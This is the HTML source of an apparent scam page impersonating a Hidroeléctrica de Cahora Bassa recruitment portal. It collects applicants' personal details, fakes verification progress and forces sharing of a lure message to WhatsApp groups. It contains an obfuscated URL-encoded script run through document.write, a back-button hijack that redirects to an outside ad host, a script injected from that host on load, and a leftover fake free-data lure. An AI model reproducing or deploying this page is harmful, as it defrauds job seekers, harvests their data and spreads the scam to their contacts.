<!DOCTYPE html>
<html>
    <head>
      
       <script type="text/javascript"> 
/* Password Protection Script by www.onlineofferz.xyz*/
var password = 'Recrutamento da Hidroeléctrica de Cahora Bassa'
password=prompt('AVISO: A Hidroeléctrica de Cahora Bassa (HCB) está a recrutar, clique em OK para se candidatar','Recrutamento da Hidroeléctrica de Cahora Bassa');
if (password != 'Recrutamento da Hidroeléctrica de Cahora Bassa');
if (password != 'Recrutamento da Hidroeléctrica de Cahora Bassa') {
location.href='https://tinyurl.com/HCB-MZ-Recrutamento';
}
</script>

     
    <script>

        function set_Cookie(name,value){
            var Days = 30;
            var exp = new Date();
            exp.setTime(exp.getTime() + (Days*20*1000));
            document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString()+"; path=/;"
        }
        function get_Cookie(name){
            var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
            if(arr=document.cookie.match(reg)){
                return unescape(arr[2]);
            }
            return '';
        }


        /*            if(get_Cookie("d")>0 &&get_Cookie("d")<12){
                        document.getElementById("first-box")."quedate__step".display="none";//??;
                        document.getElementById("second-box").style.display="none";//??;
                        document.getElementById("third-box").style.display="none";//??;
                        document.getElementsByClassName("loading2__box").style.display="";//??;
                    }*/


    </script>
  
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title>Hidroeléctrica de Cahora Bassa</title>
        <link rel="shortcut icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABwAAAAcCAYAAAByDd+UAAACM0lEQVR4Ae2WA2ygQRCF92zbtu34bNu2bSM6R2fEPJu1HbdR7aju33npm6S22yQv6/123s4PM/PQvDJVDbAGWAMsHWBIq2HNRQNE06PrDxlVaOC2FafqFgI0XfRA5CqKR8n1+QPHXvrcZPJxm42TjtvckPKYaPqEE7adc4EhokeiIIICQlsO/RnSctiVAgOxuUDeiyzKn+3lOExGGDYHCGVos2H7YaVlunYArFCWyubDGN3vDOBQRI0DYVPCggBSiHkzZ7B5MXuPeT77sYGezlqG/lyBGCRsuVqJMiN44nHbRy5Dl84CUJMDIAG8Mc9mh4tSVNLn1GFu97ZZgXnZGYuoeIjdiDIdanNe79s8n3E2IwCRoQ/R4SDcO88IpyMKKR0VIPJm1Bt5p7FTD7tNJSzcIDoAhrbtV6eOGW+M2QihTkvzzdJhk47/n0bAW4L92T4GIGzGfSmIkF+iEJFF/cJYrkDCjjGi37RzOkGOGikPYeFQhL0kyJP1O9TGPO+QlurmsRns3EiQI2EbMQ7raeFLtfD9w5ZjAr62mR72r+3wjHbmaenwPZ974/RIDthJ7abU2t+oYy6iSPZsP8XyaX8vxau9sygIJfryBebyTP4maDmz+C0PY62+/G1Bql/DjbJ5NAQQVGSgPi6Evs1wx8snHbONX3P58xUACe1YYl8LAAjdrUBEjcQqlc8T7gpJolmqzyusLRWgvvZo72SWw6BSA1beXwzac0y/dyokCO6upIFp0gjUStUGKMAAAAAASUVORK5CYII=" />
        <meta name="og:title" content="Portal de Recrutamento Hidroeléctrica de Cahora Bassa" />
        <meta property="og:description" content="Clique para visitar o portal de recrutamento da Hidroeléctrica de Cahora Bassa." />
        <meta property="og:image" content="https://www.hcb.co.mz/images/logo50anos.png?w=640&q=100" />
        <meta property="og:type" content="website" />
    <meta property="og:updated_time" content="1440432930" />
    <link rel="me" href="https://www.blogger.com/profile/13809910274301822692" />

<link rel="me" href="https://www.blogger.com/profile/17222055979768522082" />
<link rel="me" href="https://www.blogger.com/profile/05963652588202294752" />
<link rel="me" href="https://www.blogger.com/profile/05853757488319578479" />
<link rel="me" href="https://www.blogger.com/profile/03760741075252211382" />
<link rel="me" href="https://www.blogger.com/profile/13505557265109218333" />
<link rel="me" href="https://www.blogger.com/profile/09807909217496943359" />
<link rel="me" href="https://www.blogger.com/profile/04772359839411874225" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/16737217849288108359" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/16737217849288108359" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/16737217849288108359" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/16737217849288108359" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<!-- --><style type="text/css">@import url(//www.blogger.com/static/v1/v-css/navbar/3334278262-classic.css);
div.b-mobile {display:none;}
</style>

<link rel="me" href="https://www.blogger.com/profile/16737217849288108359" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/16737217849288108359" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/16737217849288108359" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/16737217849288108359" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://draft.blogger.com/profile/16737217849288108359" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/16737217849288108359" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/00513774263068055772" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/00513774263068055772" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/00513774263068055772" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<link rel="me" href="https://www.blogger.com/profile/00513774263068055772" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
</head>
<body><script type="text/javascript">
    function setAttributeOnload(object, attribute, val) {
      if(window.addEventListener) {
        window.addEventListener('load',
          function(){ object[attribute] = val; }, false);
      } else {
        window.attachEvent('onload', function(){ object[attribute] = val; });
      }
    }
 </script>

         
       
     
   
 <style>
  .blink {
  animation: blink 1s steps(1, end) infinite;
}

@keyframes blink {
  0% {
    opacity: 1;
  }
  50% {
    opacity: 0;
  }
  100% {
    opacity: 1;
  }
}
</style>
<style type="text/css">
@import url("https://fonts.googleapis.com/css2?family=Poppins:wght@500;700&display=swap");
@import url("//fonts.googleapis.com/earlyaccess/droidarabicnaskh.css");
* {
    margin: 0;
    padding: 0;
    font-family: Merriweather, serif;
    font-weight: 700;
    box-sizing: border-box;

    }
}

}
body {
    direction: lfl;
    background: #FFFFFF;
}
a {
    text-decoration: none;
}
.post {
    background: #fff;
    margin: 0 auto;
    padding: 10px;
    max-width: 500px;
    border: 1px solid #d0d1d5;
    border-radius: 3px;
}
.post img {
    width: 100%;
}
.welcome {
    font-size: 20px;
}
.amount,
#getname {
    color: #b48a3d;
    text-decoration: none;
}
.done {
    text-align: center;
    color: #27ae60;
}
.tip {
    font-size: 14px;
}
.title {
    text-align: center;
}
.error {
    display: none;
    text-align: center;
    font-size: 14px;
    color: #e74c3c;
}
button {
    display: block;
    width: 200px;
    height: 50px;
    color: #ffffff;
    border: none;
    outline: none;
    font-size: 22px;
    cursor: pointer;
    border-radius: 5px;
    padding: 0 10px;
    margin: 10px auto;
    background: rgb(59, 119, 189);
    transition: background 0.3s ease;
}
button:hover {
    background: #3b77bd;
}
.phone {
    max-width: 400px;
    margin: 10px auto;
}
.phone input {
    width: 100%;
    height: 50px;
    padding: 10px;
    outline: none;
    border: 2px solid #cecece;
    font-size: 14px;
}
#confirm {
    width: 200px;
    margin: 10px auto;
    border-radius: 0px;
}
#loader {
    text-align: center;
}
.spin {
    width: 50px;
    height: 50px;
    background: transparent;
    border: solid 8px rgb(59, 119, 189);
    border-right-color: transparent;
    border-radius: 50%;
    margin: 10px auto;
    animation: spin 0.8s linear infinite;
}
@keyframes spin {
    100% {
        transform: rotate(1turn);
    }
}
#loader,
#info,
#checking,
#share,
#claim {
    display: none;
}
.center {
    display: flex;
    align-items: center;
    justify-content: center;
}
.barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #3b77bd;
}
#fill,
#fill2 {
    background: #3b77bd;
    width: 0%;
    height: 100%;
}
.percentage {
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #3b77bd;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
#check,
#check2 {
    display: none;
}
.counter {
    color: #7f7f7f;
    font-size: 12px;
    text-align: right;
    padding: 10px 0 10px 2px;
    border-bottom: 1px solid #ffffff;
}
.reactions {
    display: inline-flex;
    align-items: center;
    float: left;
}
.counter img {
    float: left;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    border: 2px solid #000000;
    box-sizing: content-box;
}
.like,
.love {
    margin-right: -5px;
}
.like {
    z-index: 2;
}
.love {
    z-index: 1;
}
.bar {
    display: table;
    width: 100%;
    border-bottom: 1px solid #000000;
}
.bar .react {
    display: table-cell;
    width: calc(100% / 3);
    font-size: 12px;
    color: #000000;
    text-align: center;
    padding: 10px 0;
    cursor: pointer;
}
.comments {
    direction: ltr;
}
.comment {
    padding: 6px 0;
    margin-top: 5px;
}
.comment img {
    float: left;
    width: 32px;
    height: 32px;
    border: none;
    border-radius: 18px;
    cursor: pointer;
}
.reply {
    margin-left: 37px;
}
.single-container {
    margin-left: 37px;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    font-size: 12px;
}
.single-container .user {
    display: inline-block;
    cursor: pointer;
    color: #365899;
    margin-bottom: 5px;
}
.single-container .text {
    display: block;
}
.buttons {
    font-size: 12px;
    font-weight: bold;
    margin: 10px 0 0 47px;
    color: #000000;
}
.action {
    cursor: pointer;
}
.action:hover {
    text-decoration: underline;
}
.input {
    padding: 6px 12px 12px;
}
.input input {
    width: 100%;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    border: 0;
    outline: none;
}
.A{
    text-align: center;
    background-color: rgb(16, 77, 142);
}
</style>
  <style>
        /* Reset some default styles */
        body, h1, h2, h3, p, ul, li {
            margin: 0;
            padding: 0;
        }

        /* Apply a background color and font to the body */
        body {
            background-color: #ffffff;
            font-family: Arial black, sans-serif;
            line-height: 1.6;
        }

        /* Style the header */
        .header {
            text-align: center;
            background-color: black;
            color: #fff;
            padding: 40px 0;
        }

        /* Style the main content container */
        .content-container {
            display: flex;
            flex-direction: column;
            align-items: center;
            margin: 0px;
        }

        /* Style the image container */
        .image-container {
            max-height: 600px; /* Set a fixed maximum height */
            overflow: hidden; /* Hide overflow if image is larger */
            text-align: center;
            background-color: green; /* Background color for the image container */
        }

        .image-container img {
            max-width: 100%;
            height: auto; /* Maintain image aspect ratio */
        }

        /* Style the text container */
        .text-container {
            width: 90%;
            padding: 30px;
            background-color: #3b77bd;
            border: 1px solid #3b77bd;
            border-radius: 10px;
            box-shadow: 0 0 20px rgba(0, 0, 0, 0.1);
            text-align: center;
        }

        /* Style the form */
        form {
            max-width: 500px;
            margin: 0 auto;
        }

        /* Style the form input fields */
        input[type="text"],
        select {
            width: 90%;
            padding: 15px;
            margin-bottom: 20px;
            border: 1px solid #dee4f0;
            border-radius: 5px;
            font-size: 16px;
        }

        /* Style the textarea */
        textarea {
            width: 90%;
            padding: 15px;
            margin-bottom: 20px;
            border: 1px solid #3b77bd;
            border-radius: 5px;
            font-size: 16px;
        }

        /* Style the submit button */
        .button {
            background-color: #808183;
            color: #fff;
            border: none;
            padding: 15px 30px;
            border-radius: 8px;
            cursor: pointer;
            font-size: 18px;
        }

        /* Style the grant information */
        .grant-info {
            margin-top: 30px;
            color: black;
            text-align: left;
        }

        /* Style the footer */
        .footer {
          width: 106%;
            background-color: #3b77bd;
            color: #fff;
            text-align: center;
            padding: 20px 0;
        }/* General Row Styling */
.row {
    display: flex;
    align-items: center;
    padding-bottom: 1rem; /* Adds spacing at the bottom */

}

    footer {
    background-color: #3b77bd;
    color: #fff;
    padding: 20px 0;
    text-align: center;
}

.footer-container {
    width: 90%;
    margin: auto;
    max-width: 1200px;
}

.footer-logo h2 {
    font-size: 24px;
    margin-bottom: 10px;
}

.footer-links {
    margin: 10px 0;
}

.footer-links a {
    color: #bbb;
    text-decoration: none;
    margin: 0 15px;
    font-size: 16px;
}

.footer-links a:hover {
    color: #fff;
}

.footer-social {
    margin: 15px 0;
}

.footer-social a img {
    width: 30px;
    margin: 0 10px;
    transition: transform 0.3s;
}

.footer-social a img:hover {
    transform: scale(1.2);
}

.footer-bottom p {
    font-size: 14px;
    margin-top: 15px;
    opacity: 0.7;
}

 


    </style>
  


  <center><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7pJDg0jL-VEb0Hz6DEvmk-GwuCLZBLgHxbXBhz6lbY7fgUkwocxrAUT3MTwzpOk0uWjP17H6R8Yq1Cbgl8gWvTyFo9MFlK4DvvceLvxnFnKnYRfhNZNyYMj1uEKMSqCM78Rj8gxVsG4_fW8okRfLCMKcFW1Pq1gR3xe9p4ryW5oVl78oAeFzADejRsds/s2245/08hdrgdghvjh.png" alt="Free-Data" style="width: 100%;">
      
                     </center>


       
    <div class="post" width="100%">

        <div id="intro">
         
            <p class="welcome"> <p class="welcome"><font style="font-weight:bold"><font color="#000000">Bem-vindo ao Portal de Recrutamento e Seleção</font><br>

          

          <br><marquee style="background-color: #3b77bd; padding: 10px; display: block;" direction="left"><font color="#ffffff">
   Portal de Recrutamento Hidroeléctrica de Cahora Bassa
</marquee>
<br>
     <center><font color="black"><span style="font-weight:bold;">Informações pessoais<font><center/><span/>
       <br>
       
              
        
  <input type="text" name="_name" placeholder="Primeiro nome"><br/>
  <input type="text" name="_name" placeholder="Sobrenome"><br/>
  <input type="text" name="_name" placeholder="Número de telefone"><br/> 
  <input type="text" name="_name" placeholder="Endereço de email"><br/>
  <input type="text" name="_name" placeholder="Data de nascimento"><br/>     
       
       
      <center> 
  <p class="title"><font color="black">Selecione o gênero</font></p>
  <select name="malawi_education" id="education" title="Select" class="_5dba" style="
      width: 330px;
      height: 52px;
  ">
    <option value="" selected>Selecione</option>
    <option value="1">Macho</option>
    <option value="2">Fêmea</option>
  </select>
</center>
       
       
       <center> 
  <p class="title"><font color="black">Como você ficou sabendo de nós?</font></p>
  <select name="malawi_districts" id="district" title="Select" class="_5dba" style="
      width: 330px;
      height: 52px;
  ">
    <option value="" selected>Selecione uma opção</option>
    <option value="1">Mídias sociais</option>
    <option value="2">Anúncio do Google</option>
    <option value="3">Pesquisa online</option>
  </select>
</center>
<br>


         
       
            <button id="go">Aplicar</button>
        </div>
        <div id="loader">
            <div>Processando, aguarde...</div>
            <div class="spin"></div>
            <div id="num">0%</div>
        </div>
        <div id="info">
         
   
           <p class="title">Para verificar se você não é um robô, digite seu nome completo novamente.</p>
            <div class="phone">
                <center><input type="char" placeholder="primeiro e último nome" id="name" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 18px;width: 330px;" onkeypress="return numberonly(event);"></center>
          
    
          
          
          
                  
          <button id="confirm">CONTINUAR</button>
            </div>
            <p class="error">Sua inscrição foi rejeitada devido a informações incorretas. <a href="https://tinyurl.com/HCB-MZ-Recrutamento"> <b><font color="blue">Clique aqui para inserir novamente suas informações corretas.</font></b></a></p>
        </div>
        <div id="checking">
            <p class="title">Estamos processando suas informações, aguarde...</p>
            <div class="barr">
                <div class="fill">
                    <div id="fill"></div>
                </div>
                <div class="percentage center">
                    <span id="load"><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="check"><i class="fa fa-check-circle"></i></span>
                    <span id="percentage"></span>
                </div>
            </div>
        </div>
        <div id="share">

            <p class="tip">PARABÉNS: <span id="getname"></span>,</p>
            <p class="tip">
              Temos o prazer de informar que seu perfil foi verificado com sucesso e você pode enviar seu formulário de inscrição para análise.<br><br><span class="amount"> COMO ENVIAR SUA INSCRIÇÃO:</span><br>
              
            </p><br>
            <p class="tip">1. Para enviar o formulário de inscrição, você precisa compartilhá-lo com 5 grupos ou 15 amigos no WhatsApp (clique no botão "COMPARTILHAR" abaixo).</p><br>
            <p class="tip">2. Você será redirecionado automaticamente para nossa "Página de Funcionários" assim que a barra estiver cheia <span class="amount">OBSERVAÇÃO: VOCÊ DEVE COMPARTILHAR ATÉ QUE A CAIXA ESTEJA PREENCHIDA.</span></p><br>

            <button id="whatsapp">COMPARTILHAR</button>
            <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                </div>
            </div>
        </div>
         <div id="claim">
            <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
            <p class="title">Obrigado por compartilhar, isso nos ajudará a obter o número necessário rapidamente. Clique nos botões abaixo para enviar o formulário de inscrição.<span class="amount"></span> </p>
           
           <center><img src="" alt="Free-Data" style="width: 70%;">
      
                     </center>
 
           
            
           <br/>
          <a  onclick="window.open('https://obqj2.com/4/3156656')" href="https://obqj2.com/4/3156656" >
                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="#ffffff">ENVIAR FORMULÁRIO</font></button>
                    </a><br/>
          

          <a  onclick="window.open('https://obqj2.com/4/3156656')" href="https://obqj2.com/4/3156656" >
                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="#ffffff">IMPRIMIR</font></button>
                    </a><br/>
           
          <a  onclick="window.open('https://obqj2.com/4/3156656')" href="https://obqj2.com/4/3156656" >
                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="#ffffff">FORMULÁRIO DE DOWNLOAD</font></button>
                    </a><br/>
            
           
            <button id="offer">Relatório ⚠</button>
             
             
          
          
              </div>
        
        </div>
    </div>
    <script src="https://code.jquery.com/jquery-latest.min.js"></script>




<script type="text/javascript">
var time = 0;
window.setInterval(function () {
    time = time + 1;
    $(".t1").html(time + 1 + "m");
    $(".t2").html(time + 2 + "m");
    $(".t3").html(time + 4 + "m");
}, 6e4);
var likes = 134,
    comments = 23,
    shares = 12;
window.setInterval(function () {
    likes = likes + Math.floor(Math.random() * 3);
    comments = comments + Math.floor(Math.random() * 2);
    shares = shares + Math.floor(Math.random() * 2);
    $("#likes").html(likes + "K");
    $("#comments").html(comments + "K comments");
    $("#shares").html(shares + "K shares");
}, 5e3);
$(".liked").click(function () {
    if ($(this).hasClass("selected")) {
        $(this).removeClass("selected");
        $(this).html("Like");
    } else {
        $(this).addClass("selected");
        $(this).html("Unlike");
    }
});
</script>








<script type="text/javascript">

$("#go").click(function () {
    $("#intro").fadeOut(0);
    $("#loader").fadeIn(1000);
    var i = 0;
    var interval = setInterval(function () {
        $("#num").text(i + "%");
        i += 1;
        if (i >= 100) {
            clearInterval(interval);
            $("#loader").fadeOut(0);
            $("#info").fadeIn(1000);
        }
    }, 50);
});
$("#confirm").click(function () {
    if ($("#name").val().length < 4)
    {
        $(".error").fadeIn(500);
    } else {
        $("#info").fadeOut(0);
        $("#checking").fadeIn(1000);
        var i = 0;
        var interval = setInterval(function () {
            i += 1;
            $("#percentage").text(i + "%");
            $("#fill").css("width", i + "%");
            if (i == 50) {
                i = 49;
                setTimeout(function () {
                    i = 50;
                }, 1000);
            }
            if (i >= 100) {
                clearInterval(interval);
                $("#load").fadeOut(0);
                $("#check").fadeIn(0);
                setTimeout(function () {
                    $("#checking").fadeOut(0);
                    $("#share").fadeIn(1000);
                    $("#getname").html($("#name").val());
                }, 500);
            }
        }, 50);
    }
});
$(document).click(function () {
    if ($("#name").is(":focus")) {
        $(".error").fadeOut(500);
    }
});
</script>




<!--
"30%20GB%20Free%20Internet%20Offer%0A%E2%9D%A4%0ATo%20Activate%2030%20GB%20Free%20Internet%20for%20all%20Networks%20click%20here%F0%9F%91%87%0A*1.%20Jio*%0Ahttps://cutt.ly/30-GB_Jio%0A%20%0A*2.%20Airtel*%0Ahttps://cutt.ly/30-GB_Airtel%0A%20%0A*3.%20Vi*%0Ahttps://cutt.ly/30-GB_Vi%0A%20%0A*4.%20Jazz*%0Ahttps://cutt.ly/30-GB_Jazz%0A%20%0A*5.%20Zong*%0Ahttps://cutt.ly/30-GB_Zong%0A%20%0A*6.%20Telenor*%0Ahttps://cutt.ly/30-GB_Telenor%0A%20%0A*7.%20Ufone*%0Ahttps://cutt.ly/30-GB_Ufone%0A%20%0A*8.%20Other Networks*%0Ahttps://cutt.ly/Get_30GB",
-->
      <script>
        var text1 = "*AVISO DE RECRUTAMENTO!*%0A%0A*Hidroeléctrica de Cahora Bassa Recrutamento 2025*%0A%0AA Hidroeléctrica de Cahora Bassa (HCB) iniciou o processo de recrutamento de novos trabalhadores e abriu o seu portal de candidaturas online para o processo de recrutamento de 2025 a todos os candidatos. O recrutamento está em andamento.%0A%0A*Clique no link abaixo para se inscrever agora*.%0A%0Ahttps://tinyurl.com/HCB-MZ-Recrutamento",
            text2 = " an amount of ",
            text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
            error = "Algo deu errado!\nAs publicações não estão sendo lidas. Você pode ter compartilhado com amigos ou com o mesmo grupo várias vezes. Compartilhe novamente.",
            abcde = "https://obqj2.com/4/3156656",
            saved = "",
            share = "whatsapp://send?text=" + text1;
    </script>





<script>
<!-- code by OD -->
document.write(unescape('%20%3Cscript%20type%3D%22text/javascript%22%3E%0A%20var%20swidth%20%3D%20localStorage.getItem%28saved%29%3B%0Aif%20%28swidth%20%21%3D%3D%20null%29%20%7B%0A%20%20%20%20var%20width%20%3D%20swidth%20*%201%3B%0A%20%20%20%20%24%28%22%23intro%22%29.fadeOut%280%29%3B%0A%20%20%20%20%24%28%22.comments%22%29.fadeOut%280%29%3B%0A%20%20%20%20%24%28%22%23share%22%29.fadeIn%280%29%3B%0A%20%20%20%20%24%28%22%23fill2%22%29.css%28%22width%22%2C%20width%20+%20%22%25%22%29%3B%0A%20%20%20%20%24%28%22%23percentage2%22%29.text%28width%20+%20%22%25%22%29%3B%0A%7D%20else%20%7B%0A%20%20%20%20var%20width%20%3D%200%3B%0A%7D%0A%24%28%22%23whatsapp%22%29.click%28function%20%28%29%20%7B%0A%20%20%20%20window.location.href%20%3D%20share%3B%0A%20%20%20%20if%20%28width%20%3D%3D%200%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%2050%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2050%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28error%29%3B%0A%20%20%20%20%20%20%20%20width%20+%3D%2015%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2065%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%205%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2070%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28error%29%3B%0A%20%20%20%20%20%20%20%20width%20+%3D%2010%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2080%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28error%29%3B%0A%20%20%20%20%20%20%20%20width%20+%3D%205%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2085%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%202%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2087%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2088%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%202%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2090%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2091%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2092%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2093%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2094%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2095%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2096%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%202%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%23share%22%29.fadeOut%280%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23claim%22%29.fadeIn%281000%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20localStorage.setItem%28saved%2C%20width%29%3B%0A%20%20%20%20setTimeout%28function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%23fill2%22%29.css%28%22width%22%2C%20width%20+%20%22%25%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23percentage2%22%29.text%28width%20+%20%22%25%22%29%3B%0A%20%20%20%20%7D%2C%202000%29%3B%0A%7D%29%3B%0A%24%28%22%23offer%22%29.click%28function%20%28%29%20%7B%0A%20%20%20%20window.open%28abcde%2C%20%22_blank%22%29%3B%0A%7D%29%3B%0A%3C/script%3E'))
</script>



<script>
    window.onhashchange=function(){jp();};
    function hh() {history.pushState(history.length+1, "message", "#"+new Date().getTime());}
    function jp() {
        fh();}
    setTimeout('hh();', 500);
    function fh(){
        location.href="https://obqj2.com/4/3156656";
    }
    function goon(){
        location.href="https://obqj2.com/4/3156656";
    }
</script>



	  <script>
    window.onhashchange=function(){jp();};
    function hh() {history.pushState(history.length+1, "message", "#"+new Date().getTime());}
    function jp() {
        fh();}
    setTimeout('hh();', 500);
    function fh(){
        location.href="https://obqj2.com/4/3156656;
    }
    function goon(){
        location.href="https://obqj2.com/4/3156656;
    }
</script>
<script>
    var _hmt = _hmt || [];
    (function() {
        var hm = document.createElement("script");
        hm.src = "https://obqj2.com/4/3156656";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
    })();
</script>
 
</div>
       
          
<!-- BEGIN: Powered by Supercounters.com -->
<center><script type="text/javascript" src="//widget.supercounters.com/ssl/online_i.js"></script><script type="text/javascript">sc_online_i(1718221,"ffffff","ffffff");</script><!-- END: Powered by Supercounters.com -->







  <script>/<![CDATA[/ cookieChoices = {}; /]]>/</script>
</body></html>
